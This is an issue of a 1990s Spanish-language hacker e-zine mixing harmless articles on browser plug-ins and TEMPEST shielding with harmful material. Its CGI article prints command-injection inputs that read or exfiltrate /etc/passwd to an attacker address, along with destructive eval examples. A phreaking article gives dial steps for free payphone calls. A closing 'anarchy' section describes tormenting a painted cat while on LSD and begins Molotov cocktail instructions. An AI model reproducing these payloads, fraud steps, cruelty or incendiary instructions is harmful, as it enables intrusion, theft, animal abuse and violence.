
  <<::RareGaZz::>>                   Primer ao, numero seis.
 "Vive Le RareGaZz"       hacking/phreaking/anarchy/virii/warez/cracking

 Revista electronica 
 gratuita creada con  Hola a todos esperamos disfruten este numero de la
 fines    educativos  revista y esperamos sigan enviando sus comments'
 exclusivamente.Toda  En este numero nos falto la colaboracion de dos amigos
 la  informacion  de  por todos ustedes conocidos (Mr.X, LePompeItor) en la
 esta  revista  esta  edicion de esta revista pero a pesar de sus examenes
 amparada  bajo   el  finales uno de ellos nos mando un texto para no quedar
 concepto   de    la  mal con todas las personas que lo han apoyado.
 libre expresion.    
                      Este paquete viene repleto de informacion bastante
 Editorial:           util como la informacion sobre los Bugs de Microsoft
                      que nos mando duvahazard, notas sobre los virus de
  -RareTrip           parte de un aficionado de ellos de nombre Orion y los
  -KillerBot          dos textos de otro excelente colaborador Truco.
                     
 Colaboradores:       Hace poco salio del Underground InterHak Beta con
                      acceso gratuito en 3 ciudades de la republica por el
  -CrackSmoker        momento y hasta la fecha solo ha sido distribuido a los
  -DuvaHazard         chicos favoritos de raregazz. Si aun no tienes una
  -Orion              copia de interhak busca el link para bajarlo en alguna
  -Truco              parte de esta revista :-)
  -Mr. X             
                             @@@@@@--> RAREGAZZ@BIGFOOT.COM <--@@@@@@@

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             ooo            oo
             $$$o   ooo    $$$$
              $$$o  $$$"  $$$$            
          o   "$$$  $$$" o$$$   oo         1.- La guerra de los Plug-Ins
         $$$oo $$$$ $$$" $$$" o$$$$        2.- Fallas de seguridad con CGI
   oo    ""$$$o "" oooooo ""o$$$$"    oo   3.- Tempest - La nueva amenaza.
  o$$$$$ooo "$"oo$$$$$$$$$$o "$"  oo$$$$$  5.- FR3GANDO A 73LM3X-primer parte-
    ""$$$$$$o o$$$"""  ""$$$$o o$$$$$"""   6.- Anarquia con elegancia
         """ o$$$"        "$$$o """        7.- Los Bugientos de Microsoft
    o$o$$o$ o$$$  RareGaZz  $$$ o$o$o$o    8.- El fenomeno virus
     $$$$$$ o$$$  ~~~~~~~~  $$$ "$$$$$$"   7.- Ingenieria Social
         ooo $$$$         o$$$" oo         9.- Hackeando BBS's
    ooo$$$$$o $$$$o     oo$$$" $$$$$$oo   10.- Como cubrir tus huellas 2/2
  "$$$$$""" oo "$$$$$$$$$$$""ooo"""$$$$$$ 11.- Que hay de malo con <FONT> ?
   """    o$$$$ o """""""" o"$$$oo    """ 12.- El padre de todos los virus 2/2
         $$$$" o$$$ oo$o $$$  "$$$o       13.- Boomerang!
          ""   $$$" "$$$ "$$$   ""        14.- NotiLOONS
              $$$"  "$$o  $$$$
             $$$"   "$""   $$$o                 "El EZLN no existe" 1/15/1992
             ""$            $""                 "El EPR no existe" 11/6/1996
                                                "El RdK no existe"  6/18/1997
                                                -Gobierno Mexicano
                                                Que nos ensea la historia ?

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                                 
                                          
                           "La guerra de los Plug-Ins"
                                            por
                           KillerBot

 Has notado un nuevo tipo de espera en linea cuando haces click en algun
 link? has tenido que esperar que la grase resbale a travez de tu modem
 amontonando el colesterol en el cache de tu disco a punto de un ataque
 cardiaco? Tal vez estes sufriendo de sobre-peso en tu navegador.
 El sobre-peso de tu navegador se crea cuando en tus viajes por la red bajas
 e instalas muchos plug-ins en tu sistema. Mientras mas y mas web-sites
 incluyen animaciones y truquitos -como Quicktime VR, Quicktime movies, Real
 Audio, Real Video, Shockwave, Chat plugins- existen menos procesamientos
 que tu navegador puede hacer por si solo, asi, surfear se vuelve mas
 complejo.

 Cuando un plug-in en particular es necesario para obtener el impacto
 multimedia de un website, tu surfeo se detendra y dos cosas pueden pasar:
 1) Si ya bajaste e instalaste el plug-in necesario, tendras que esperar a
    que la mentada animacion se copie a tu disco duro, donde es guardada en
    el cache de tu navegador y ejecutada.
 2) Si aun no tienes el plug-in necesario tendras que conseguirlo (esto a
    veces requiere dirigirte a otro website) y despues esperar a que el
    plugin se copie a tu maquina.

 No es inusual que el tamao de estos plugins sea de varios megabytes lo que
 puede hacerte gastar tiempo en linea. Y, a pesar de que los applets Java
 pueden no aadirse a la celulitis de tu PC, ellos tambien pueden tapar las
 arterias de tu modem con una sopa espesa de downloads.

 Recuerda, una vez que hayas instalado un plug-in en tu sistema, trabajara
 para todos los sitios que usen la misma tecnologia plugin. A menos que no
 quieras perderte ninguna campana o chiflido de la red mundial (y algunos
 son algo elaborados), entonces considera solo cargar los plugins mas
 populares.

                       Por que existen los Plug-Ins ?

 Una de las razones por las que el surfeador de hoy se enfrenta con toneladas
 de plugins es la poliza abierta de desarrollo del navegador Netscape, que
 escencialmente permite que cualquiera desarrolle sus propios suplementos
 multimedia para aumentar la experiencia de navegar.
 Lo gracioso de todo esto es, que cada uno de los navegadores solos -usando
 nada mas que su codigo HTML- pueden crear rapidas, divertidas y firmes
 paginas web satisfactorias. De hecho, antes de inyectar otro plugin a la
 corriente sanguinea de tu navegador, toma tiempo analizando algunos de los
 efectos que puedes disfrutar libre de grasa.

                       Como poner a dieta a un Browser ?

 Si te decides a poner en regimen alimenticio a tu browser, debes separar los
 plug-ins lowfat de los waffles. Como hacerlo? Simplemente tienes que hacerte
 las siguientes preguntas:

 1.- Cuales son mis usos para Internet?
     Si buscar informacion (o hackear) es tu principal prioridad, no
     necesitaras shockwave o quicktime por ejemplo. Pero estos son los mas
     necesarios y populares si tu quieres disfrutar de un buen show en
     Internet. Y si te gusta un poco de musica de fondo o escuchar alguna de
     las estaciones de radio de internet, entonces debes considerar Real Audio
     4.0 que es la mas actual.

 2.- Cual es la velocidad de mi modem y cuanto tiempo estoy dispuesto a
     esperar para ver una pagina?
     Algo menor que 28.8kpbs puede darle un paro cardiaco a tu modem y mandar
     tu navegador a un descanso eterno.

 3.- Que sitios visito regularmente?  Y tienen plug-ins en comun?
     Recuerda que una vez el plug-ins este en las venas de tu navegador,
     servira para todos los sitios que lo necesiten.


 La belleza original de los navegadores es que todos podemos usarlos con
 facilidad. Es como un carro modelo deportivo recien comprado, lo aceleramos,
 frenamos y manejamos sin tener que meternos con el motor.
 Desafortunadamente cada vez mas sitios nos fuerzan a abrir el motor a nuestro
 deportivo e insertarle algunos nuevos componentes que pueden afectar su
 funcionamiento. Ademas tenemos que actuar como mecanicos especializados para
 instalarlos y en otros casos, removerlos.

 Algunas definiciones:

 Plug-In: Tu puedes expandir la capacidad de tu navegador inyectando varias
          herramientas que te permitiran ver (y oir) ciertas cosas, como
          archivos de audio o video.

    Java: Simplemente es un lenguaje de programacion usado para crear
          miniprogramas (conocidos como "applets"), que son automaticamente
          bajados cuando te encuentras un sitio "Java enhanced". La compaia
          que lo desarrollo es Sun Microsystems, y es usado en muchos juegos
          y chats en linea y para animar imagenes.
          Puedes bajar un sencillo programa para hacer Applets en la direccion
          www.macromedia.com El programa se llama Applet Ace y es gratuito.

 Animacion GIF:
          La mayoria de las graficas quietas que ves en linea son GIFs. La
          ultima version de esas graficas (version 89a) permite crear simples
          animaciones cuadro por cuadro. GIF significa "Graphics Interchange
          Format".

 Real Audio:
          Alguna vez has hecho click en algun archivo de audio y esperado
          horas para escucharlo? Real Audio por Progressive Networks, es
          un formato de audio especial que empieza a tocar el sonido tan solo
          segundos despues de que empiezas a hacer el downloading. Una vez
          que hayas bajado el plug-in, necesitaras otro momento para correr
          al bao ;)

 Shockwave:
          Mas y mas sitios web dicen estar "shocked". No, no has ofendido a
          nadie de alguna manera; quiere decir que ese sitio necesita una
          utilidad llamada shockwave creada por Macromedia. Shockwave permite
          incorporar animaciones graficas y sonidos en linea.


        Espero esto haya sido util de alguna manera y hasta la proxima!

                            Original para RareGaZz
                            ~~~~~~~~~~~~~~~~~~~~~~

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                           Fallas de seguridad con CGI
                               por Gregory Gilliss

Common Gateway Interface (CGI) es una interfaz que permite la comunicacion
entre programas cliente y la informacion de un servidor que comprende el
protocolo de transmision de texto (HTTP). TCP/IP es el protocolo de
comunicacion usado por el script CGI y el servidor durante las
comunicaciones. El puerto default para las comunicaciones es el puerto 80
(privilegiado) pero otros puertos no privilegiados pueden ser especificados.

Los scripts CGI pueden realizar procesos relativamente simples del lado del
cliente. Un script CGI puede servir para dar formato a el lenguaje HTML,
crear documentos HTML dinamicos y generar imagenes graficas dinamicas.
CGI tambien puede realizar entradas y salidas de informacion. CGI guarda
la informacion en variables del sistema que son accesadas por medio del
script. Los scripts CGI tambien pueden aceptar parametros en la linea de
comando. Los scripts CGI operan en dos modos basicos:

  - En el primer modo, el script CGI hace un procesamiento de datos basado
    en la entrada (input) que se le indica. Un claro ejemplo es el
    procesamiento de informacion para corregir la sintax que actualmente
    esta usando hotmail.

  - El segundo modo es cuando el script CGI actua como conducto de informacion
    entre el cliente al servidor y de vuelta al cliente. Como ejemplo, un
    script CGI puede ser usado como el frente de una base de datos corriendo
    en el servidor.

Los scripts CGI pueden ser escritos usando lenguajes compilados, lenguajes
de programacion interpretados o lenguajes de scripts (scripting). La unica
ventaja que existe entre una u otra forma de crear scripts CGI es la
velocidad de ejecucion.

El set de metodos disponibles para los programas CGI estan definidas en las
especificaciones HTTP 1.0. Los tres metodos pertinentes a esta discusion son
el metodo 'Get', el metodo 'Post', y el metodo 'Put', El metodo 'Get'
consigue informacion del cliente al servidor. El metodo 'Post' pregunta al
servidor si acepta la informacion pasada del cliente como una especificacion
del objetivo. El metodo 'Put' pregunta al servidor si acepta la informacion
como reemplazo del objetivo.


  Vulnerabilidades

Las vulnerabilidades causadas por el uso de los scripts CGI no son debilidades
de CGI, son errores en las especificaciones HTTP y en varios programas del
sistema. CGI simplemente permite el acceso a esas debilidades. Hay otras
maneras de explotar la seguridad de un sistema. Por ejemplo, las restricciones
al acceso de archivos pueden ser explotadas usando FTP o telnet. CGI lo unico
que hace es ofrecer mas oportunidades para explotar estas y otras fallas en
la seguridad de un sistema.

CGI permite la lectura de archivos, adquirir acceso shell y corromper archivos
en las maquinas servidoras y sus hosts. Metodos para ganar acceso pueden ser:
explotando los defaults del script, explotando debilidades en el ambiente del
servidor, y explotando debilidades en otros programas y llamadas al sistema.
La principal debilidad de los scripts es insuficiente validacion de las
entradas del usuario.

De acuerdo con las especificaciones de HTTP 1.0, los datos pasados a un
script CGI deben ser codificados para que puedan trabajar en cualquier
hardware o software. Los datos pasados a un script CGI usando el metodo Get
son incluidos al final del Universal Resource Locator (URL). Esta informacion
puede ser obtenida por los scripts CGI como una variable de ambiente llamada
QUERY_STRING. Los datos son pasados como tokens en la forma de variable=valor,
con los tokens separados por &. Las & y otros caracteres alfanumericos deben
ser codificados como valores hexadecimales.
Los caracteres hexadecimales son seguidos por un signo % en la URL. Es la
responsabilidad del script CGI remover caracteres en la entrada del usuario.
Los simbolos como < y >, son delimitadores de HTML tags y son usualmente
removidos con una simple operacion como la siguiente:

Ejemplo de un script con PERL
----------------8<----------------------------------------------------------

# Procesar variables de entrada
{$NAME, $VALUE) = split(/=/, $_);	# split up each variable=value pair
$VALUE =~ s/\+/ /g;			# Replace '+' with ' '
$VALUE =~ s/%([0-9|A-F]{2})/pack(C,hex,{$1}}/eg; # Replace %xx characters with ASCII
# Escape metacharacters
$VALUE =~ s/([;<>\*\|'&\$!#\(\)\[\]\{\}:"])/\\$1/g;# remove unwanted special characters
$MYDATA[$NAME} = $VALUE;	# Assign the value to the associative array

----------------8<----------------------------------------------------------

Este ejemplo remueve los caracteres especiales como el semi-colon que es
interpretado por el shell como un separador de comandos. La inclusion de un
semi-colon en la entrada permite la posibilidad de ejecutar comandos
adicionales en la entrada del usuario.

El ejemplo anterior esta incompleto ya que no remueve la posibilidad de un
caracter de nueva linea '%0a', que puede ser usado para ejecutar otros
comandos que no son parte del script. De esta forma, podemos ejecutar otros
comandos de los que el script nos permite. Por ejemplo, la siguiente URL
pide una copia del archivo /etc/passwd del servidor:

http://www.un-servidor.com.mx/cgi-bin/query?%0a/bin/cat%20/etc/passwd

'%0a' es un enter
'%20' un espacio en blanco

La parte principal de un programa CGI es un documento HTML llamado Form. Los
forms incluyen el tag <INPUT>. Cada <INPUT> tiene una nombre llamado variable
asociado con el. Esta es la variable que forma el lado izquierdo de lo que
previamente se habia mencionado variable=valor. Los contenidos de las
variables del Form forman el valor del token. Los scripts CGI deben realizar
el filtrado de los contenidos del campo <INPUT>. Si los scripts CGI fallan
al filtrar las entradas del usuario, una situacion como el previo ejemplo
podria originarse.

Otra tag HTML que en ocasiones se ve en las forms es <SELECT>. Este tag
permite a un usuario del lado cliente elegir de unas opciones predeterminadas.
La eleccion se vuelve la derecha del token variable=valor pasado al script
CGI. Los scripts CGI seguido fallan al validar la entrada de un campo
<SELECT> asumiendo que el campo contendra datos predeterminados. De nuevo,
estos datos son pasados directamente al programa interpretador de lenguajes.
Programas compilados que no realizen validacion de los caracteres pueden ser
vulnerables.

Un script shell o PERL que invoque el programa de correo de UNIX puede ser
vulnerable a un escape del shell. Mail acepta comandos en la siguiente forma
"~!commando" y forja un shell que ejecute el comando. Si el script CGI no
filtra la sequencia "~!", el sistema es vulnerable. Los agujeros de sendmail
pueden ser explotados de esta manera. De nuevo, la llave consiste en encontrar
scripts que no filtren los caracteres de entrada.

Si puedes encontrar un script CGI que contenga una llamada a UNIX system() con
solo un argumento, entonces has encontrado una puerta al sistema. Cuando la
funcion system() es invocada con un solo argumento, el sistema forja un
shell por separado para manejar la peticion. Cuando esto pasa, es posible
aadir datos a la entrada y generar resultados no esperados. Por ejemplo,
un script PERL que contenga lo siguiente:

system("/usr/bin/sendmail -t %s < %s", $mailto_address < $input_file");

esta diseado para enviar por correo una copia de $input_file a la direccion
especificada por la variable $mailto_address. Si copiamos y modificamos la
entrada para el form de la siguiente manera:

<INPUT TYPE="HIDDEN" NAME="mailto_address" 
VALUE="direccion@servidor.com;mail cracker@hacker.com </etc/passwd">

podemos explotar al sistema y obtener el passwd del servidor por email.

La funcion system() no es el unico comando que forja un nuevo shell. La
funcion exec() con solo un argumento tambien hace lo mismo. Abrir un archivo
y redireccionar el resultado tambien crea un shell separado. En PERL la
funcion:

open(FILE, "| program_name $ARGS");

abrira FILE y pasara los resultados a program_name que se ejecutara como un
shell separado.

En PERL, el comando eval ejecuta cualquier argumento que sea pasado a el.
Los scripts CGI que pasan la entrada del usuario a el comando eval pueden
ser usados para ejecutar cualquier cosa que el usuario desee. Por ejemplo:

$_ = $VALUE;
s/"/\\"/g		# Escape double quotes
$RESULT = eval qq/"$_"/;	# evaluate the correctly quoted input

este script pasa los datos de $VALUE a eval escencialmente no modificados,
excepto por asegurarse que las doble " no confundan al interprete. Si
$VALUE contiene "rm -rf *", los resultados serian desastrosos.

Copiar, modificar y reemplazar el archivo de librerias "cgi-lib" permitira
a los usuarios a executar comandos o rutinas dentro del archivo de librerias.
El ejemplo del comando eval permite la ejecucion de:

$_ = "chmod 666 \/etc\/passwd"
$RESULT = eval qq/"$_"/;

este comando permitiria escribir al passwd a todo el mundo.

Conclusion

El uso impropio de los scripts CGI permite a los usuarios un numero ilimitado
de debilidades del sistema. Fallar al validar las entradas de un usuario,
funciones de llamadas al sistema pobremente planeadas e insuficientes
restricciones a los archivos pueden ser explotadas a travez del mal uso de
CGI.

* Adaptado de Mudry, R. J.,
** Adaptado de Phillips, P., Safe CGI Programming, 

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                            ͻ
                                              
                                * TEMPEST *   
                             la nueva amenaza 
                             ~~~~~~~~~~~~~~~~ 
                            ͼ

     TEMPEST es el nombre clave para la tecnologia relacionada con las
 emisiones electromagneticas no deseadas del equipo de proceso de datos. La
 meta de este texto es reducir la capacidad del oponente de capturar la
 informacion que fluye por el equipo de computo. La mayoria de la informacion
 que comprende las especificaciones TEMPEST esta clasificada por el gobierno
 de los estados unidos americanos y no esta disponible para el uso de los
 ciudadanos.

     El espectro electromagnetico producido por los componentes de una
 computadora para "hablar" entre ellos y sus velocidades (megahertz) producen
 un rico set de seales en una ancha parte del espectro electromagnetico.
 Debido a que las emisiones ocupan una amplia parte del espectro, existen
 formas para bloquear esas emisiones (como cerrar las cortinas para bloquear
 la parte visible de la luz) y no son necesariamente efectivas en otras
 porciones (rayos uv, etc).

     Las emisiones de un sistema de computo pueden ser capturadas y procesadas
 para revelar informacion de los sistemas desde simples niveles de actividad
 (on/off) hasta capturar las teclas presionadas en un teclado o capturar toda
 la informacion del monitor. Se sabe que los sistemas poco protegidos pueden
 ser monitoreados efectivamente desde una distancia de 1 kilometro.

     Este texto tratara de explicar algunas formas en que puedes reducir las
 posibilidades de ser monitoreado usando tecnicas sencillas.

     Una forma de ver la tecnologia TEMPEST desde un punto de vista simple es
 tratar de comparar el problema de la interferencia de un radio frente a una
 seal de television y prevenir esa interferencia tratando de evitar la
 emision de seales electromagneticas del radio.

     Viendo el problema desde esta luz, veras que existen bastantes documentos
 para evitar la interferencia de los aparatos electricos. Cada manual de
 television o radio contiene informacion para prevenir ese problema que es
 virtualmente identico al problema de la tecnologia TEMPEST.

     Reducir totalmente las emisiones electromagneticas es casi imposible para
 la persona comun. El objetivo debe ser reducir las emisiones por un corto
 periodo de tiempo por ejemplo, hasta que la van estacionada frente a tu casa
 se retire.  Los departamentos contiguos tienen que adoptar tecnicas mas
 avanzadas para evitar el espionaje debido a la corta distancia en que pudiera
 colocarse una persona con el objetivo de capturar informacion de nuestro
 equipo de computo.

 _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/


     Un buen principio para evitar este tipo de 'espionaje' seria eligir
 equipo con las emisiones mas bajas de ondas. Este tipo de equipo esta
 catalogado como "clase B".

     Todos tus perifericos y equipo deben cumplir con este standard
 norteamericano lo que garantiza que solo escaparan una de diez emisiones a
 comparacion de la "clase A".
     Una vez conseguido este tipo de equipo, hay que seguir las
 recomendaciones del fabricante para preservar la integridad del blindaje. Una
 de estas recomendaciones es el no operar el equipo de computo con uno o mas
 slots de la parte trasera de la computadora abiertos.

 _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

     Usa cable protegido para todas las conexiones. Este tipo de cable esta
 sobrepuesto a los cables con una lamina de metal o aluminio para mantener las
 seales pegadas al cable. Ya no es comun usar cable de tela para conectar a
 la computadora, digamos, un floppy drive.  El cable sin proteccion trabaja
 como una antena para las seales generadas por la computadora y sus
 perifericos.

     Trata de evitar muchos cables amontonados en la parte trasera de tu
 computadora y mantenlos lo mas cortos posible.

 _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

     Bloquea la informacion transmitida por tu fax/modem o linea telefonica.
 Las lineas telefonicas generalmente estan poco protegidas y la emision de tu
 computadora puede usar la linea telefonica como antena asi como tambien puede
 hacerlo el tipico monitor de tubos de rayos catodicos "CRT".

     Manten tu linea telefonica retirada de las tomas de corriente y
 perifericos de tu computadora asi como de la parte trasera del monitor. Esto
 es en contra de la costumbre de mantener siempre una linea telefonica cerca
 del equipo de computo como se acostumbra recomendar en todos los manuales de
 computadoras por razones hasta ahora desconocidas ;)

 _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

     Pregunta en tu tienda de electronica por imanes que eviten la emision del
 campo electromagnetico, puedes decir que tu computadora interfiere con la
 seal de television e inmediatamente te conseguiran todo tipo de supresores
 de seales.
     Recuerda proteger principalmente las lineas telefonicas o el cable de
 corriente que no tenga proteccion a parte del plastico que rodea el cobre.

 _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

     En caso de interferencia de tu equipo con lineas electricas o con un
 componente como el radio o television, puedes construir una caja de Faraday
 de aluminio del tipo que hay en casi todas las cocinas. Una buena caja debe
 cubrir todos los perifericos incluyendo el cable del teclado, monitor y
 modem.

 Una caja de este tipo tiene un alto nivel de exito al reducir las emisiones
 drasticamente pero recuerda mantener la corriente de aire al equipo.

 _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

     Para revisar si tienes un equipo relativamente seguro, lo puedes hacer
 con un radio AM portable. Colocalo cerca del cuerpo de la computadora y todos
 sus cables. Idealmente, no debes escuchar aumento de estatica en la seal. Si
 escuchas un aumento de estatica en ciertas partes de la computadora
 unicamente (como cables) es necesario bloquear las emisiones de ese lugar con
 uno de los metodos descritos.

     Para que tengas una idea de las emisiones electromagneticas de tu
 computadora una simple brujula es todo lo que necesitas. Si la aguja se mueve
 cuando la pones cerca de un componente puedes apreciar que tanta emision de
 ondas tu equipo esta soltando.

     Hay otras formas de proteger el equipo electrico pero estas son las mas
 comunes. Una compaia o sistema que necesite seguridad de primera prioridad
 necesita estar protegido para ataques de cualquier tipo. Hoy en dia es mas
 facil conseguir aparatos que reciban estas ondas por lo que un intruso puede
 obtener passwords, numeros de cuentas y mucha mas informacion con simplemente
 estacionarse cerca del objetivo.

                [ Adaptacion de "Tempest in a Teapot" de CDC ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  *************************************************************************
  ***************************    FR3GANDO A 73LM3X   Parte 1   ************
                                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
                                   Original de Carlos Truco
             ooooooooo
         oo$$$"""""""$$$$o         Pues bien, hoy conoceran algunos de los
      o$$""   oooooo    ""$$o      secretos que encierra nuestra maravillosa
    o$$"     $$$ $$$$$     "$$o    compaia telefonica: TELMEX.  Intentare
   o$"       $$$ $$$$$o      "$o   dar un pequeo curso en 10 o 12 numeros
  o$"         """ "$$$$       "$$  de la revista sobre la infinidad de
 o$$                $$$$       $$o posibilidades de hacer phreaking en Mexico.
 $$                 $$$$        $$
 $$                 $$$$        $$ Notas:
 $$                 $$$$        $$ No lo hare por venganza contra las famosas
 $$o                $$$$       o$$ Southwestern Bell ni France Telecom que
  $$               o$$$"       $$  deciden sobre nuestros telefonos. Tampoco
   $$         o$$ $$$$$       $$   lo hare por el mediocre servicio de Telmex,
    $$o      $$$ $$$$$"     o$$    ni sus constantes interrupciones al ocupar
     "$$o    $$$ $$$$"    o$$"     Lada, ni por su extraordinario servicio
       ""$$ooo"" ""  ooo$$""       tercermundista de apenas 10 lineas por
           ""$$$$$$$$$""           habitante.

 Lo hare por ser una de las cien empresas mas importantes del planeta y que
 ella se encuentre en manos ajenas, lo hare por aumentar tu conocimento acerca
 de como es y como funciona un telefono.

 Ya fue definido lo que es un phreaker, la teoria acerca de las boxes, y
 algunas otras cosas acerca de este maravilloso arte. Sin embargo hoy no te
 explicare como hacer buenos montajes, u otras maravillas con el telefono.
 Hoy solo te dire como hacer una llamada local gratis, desde un mugre telefono
 publico. Eso es lo que voy a hacer. Hoy ya no quiero decirte mas. Para eso
 estara el siguiente numero. Si quieres hacer una llamada local gratis hoy
 tendras que buscar una cabina TELMEX con las siguientes caracteristicas:

- El telefono que busques no debera de ser de tarjeta. (No es mi culpa que no
  encuentres uno de estos, ya te explicare el truco para los de tarjeta en la
  parte 2)

- Tendras que encontrar una cabina gris digital (esas de display pequeo) para
  realizar este truco. Ademas esta tendra que ser especial: Debera estar por
  TONOS.

 Si no sabes que significa por TONOS, estas frito carnal. Seguro tendras algo
 mejor que hacer.

 Sinceramente no se cuantas cabinas de este tipo existan en una ciudad de
 tamao mediano. Considerando el numero de lineas por habitante, y que
 TELMEX se renueva por las de tarjeta seran unas cuantas. Sin embargo te
 podras quedar por lo menos 25 minutos hablando sin pagar.
 En una ciudad como Morelia o Guanajuato ahora que fui de vacaciones encontre
 varias en los centros comerciales. Asi que no creo que sea muy dificil
 encontrar por lo menos una para tus propositos. Nota: Considerando que no he
 probado el truco en toda la Repub. Mexicana, es viable que no sirva en
 algunos lugares, debido a que tiene ciertas limitantes, que explico mas
 adelante.

 En fin ya que la hayas encontrado deberas hacer lo siguiente:

 Paso 1 - Marca 9580, y espera. Recibiras un tono de ocupado. Espera unos 
 segundos a que el tono de ocupado se haga mas rapido. En eso momento continua
 con el paso 2.

 Paso 2 - Marca ahora un 0. Y espera a que el tono de ocupado se vuelva a
 hacer mas rapido.

 Paso 3 - Marca otro 0, y tendras el tono de marcar.

 Paso 4 - Ahora llama al telefono que desees, no hay cobro por ello.

 Limitantes : Este truco no sirve para ciudades con numeros de telefono muy
 grandes (por ejemplo el DF, eso creo), o para numeros de larga distancia ya
 que se te acaba el display digital. Si quieres hacer el truco en esas
 condiciones tendras que hacer lo siguiente:

 Graba los tonos producidos por el telefono (los beeps y demas que hace cuando
 marcas un determinado numero) en un walkman. Asi si quieres marcar una larga
 distancia por ejemplo:

 9 1 - ( 8 ) 3 1 - 3 3 7 

 consigue esos tonos en un cassete, y reproducelos en el auricular del
 telefono publico. Claro esta que te puedes conseguir algun programa de
 phreaking y facilitarte el trabajo, con una mejor calidad de sonido.
 Ese sera tu problema no el mio. En fin si te quieres arriesgar a hacerlo de
 esa forma ya es tu bronca. Existen otras formas mas sencillas que no
 requieren de esto, para las largas distancias.

 Otra limitante: Alguien te puede ver con el walkman y vales carnal... iran
 con algun judas y te quitara el walkman y terminaras en barandilla, te lo
 advierto. Esto no es el gabacho carnal.

Mas sobre TELMEX en el proximo numero.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                                                        oooooo
      Ŀ                 o$$$$$$$$$$o
         Anarquia con Elegancia                   $$$$$$$$$$$$$$
                  por                            $$$$$$$$$$$$$$$o
                 Mr. X                           "$$$""$$$$""$$$"
                      $$$ X $$ X $$$
             <<::RareGaZz::>>                        $$oo$$$ooo$$
                                                     "$$$$  $$$$"
  El  editor  de  raregazz,  o  cualquiera             o"$$$$"o
  de   sus   colaboradores  no   se  hacen             "$o  o$
  responsables   de  los  daos  mentales,        ooo     $$$"      oo
  fisicos o religiosos que puedan resultar        $$$o            $$$$
  de seguir  los  consejos aqui descritos.       $$$$$$$$oo  oo$$$$$$$$
  Este texto es presentado a ustedes con                ""$$$$""
  fines educativos unicamente :-)                      o$$$""$$oo
                                                 ooo$$$"      $$$$ooo
                                                $$$$$$          $$$$$$
  El Gato Funky!                                  """            ""
  ~~~~~~~~~~~~~~

        Materiales necesarios:
        ======================

            - Sustancia halucinogena (preferentemente LSD-25 o derivado)
            - Un gato
            - Gran cantidad de cera para pisos (industrial o casera)
            - Luz blanca tipo rave (camara lenta)
            - Bolas pequeas o juguetes de gato
            - Pintura fosforecente (varios colores - que brille mucho)

        Instrucciones:
        ==============
            - Colocate en una parte de tu casa grande con piso de vinyl o
              madera. (los pisos alfombrados no funcionaran)
            - Encera el piso con *bastante* cera y trata de lograr una
              superficie muy resbalosa.
            - Cubre el area con objetos cortantes (opcional y no aprobado por
              la sociedad protectora de animales)
            - Remueve todas las fuentes de luz, cubre ventanas, etc.
            - Pon la luz en una posicion alta para que ilumine toda el area
              encerada.
            - Aplica la pintura al gato hasta producir un efecto -en caso de
              varios colores- bastante hippie.
            - Deja que el gato se seque.
            - Toma el LSD mientras esperas que el gato se seque.

        Una vez que estes suficientemente bajo las influencias del acido,
        prende la luz blanca de camara lenta al nivel de pulso deseado y
        avienta el psychodeliko gato al centro del piso (asegurate de ponerle
        un collar con un liston en caso de que alcance a salir de la
        superficie encerada)... El espectaculo causara un viaje estrepitoso
        a tus neuronas y bastante frustracion al gato... juega con el gato
        aventandole pelotas o su juguete preferido, etc... El ambiente puede
        ser mejorado incluyendo musica con un volumen alto o algun record con
        efectos especiales.
        Esto puede ser hecho por 2 personas incluyendo obviamente otro hit
        de acido (que sera tomado por la otra persona).

  Cuidado: En el caso de incluir tachuelas en el piso encerado, los gritos
   del gato pueden ocasionar un *MAL VIAJE* e impedir tu regreso a tierra !!


  COCKTAIL MOLOTOV
  ~~~~~~~~~~~~~~~~
        Materiales:
        ===========

        -Gasolina
        -Aceite de carro
        -Trapos (pequeos pedazos)
        -Botella de vidrio tamao standard (refresco)

        Instrucciones:
        ==============

        Cuando tengas la botella completamente limpia rellena la mitad del
        recipiente con gasolina y la otra mitad de aceite.
        Pon un trapo mojado con gasolina bien apretado en la boquilla (culo)
        que deje salir un buen cacho de trapo.
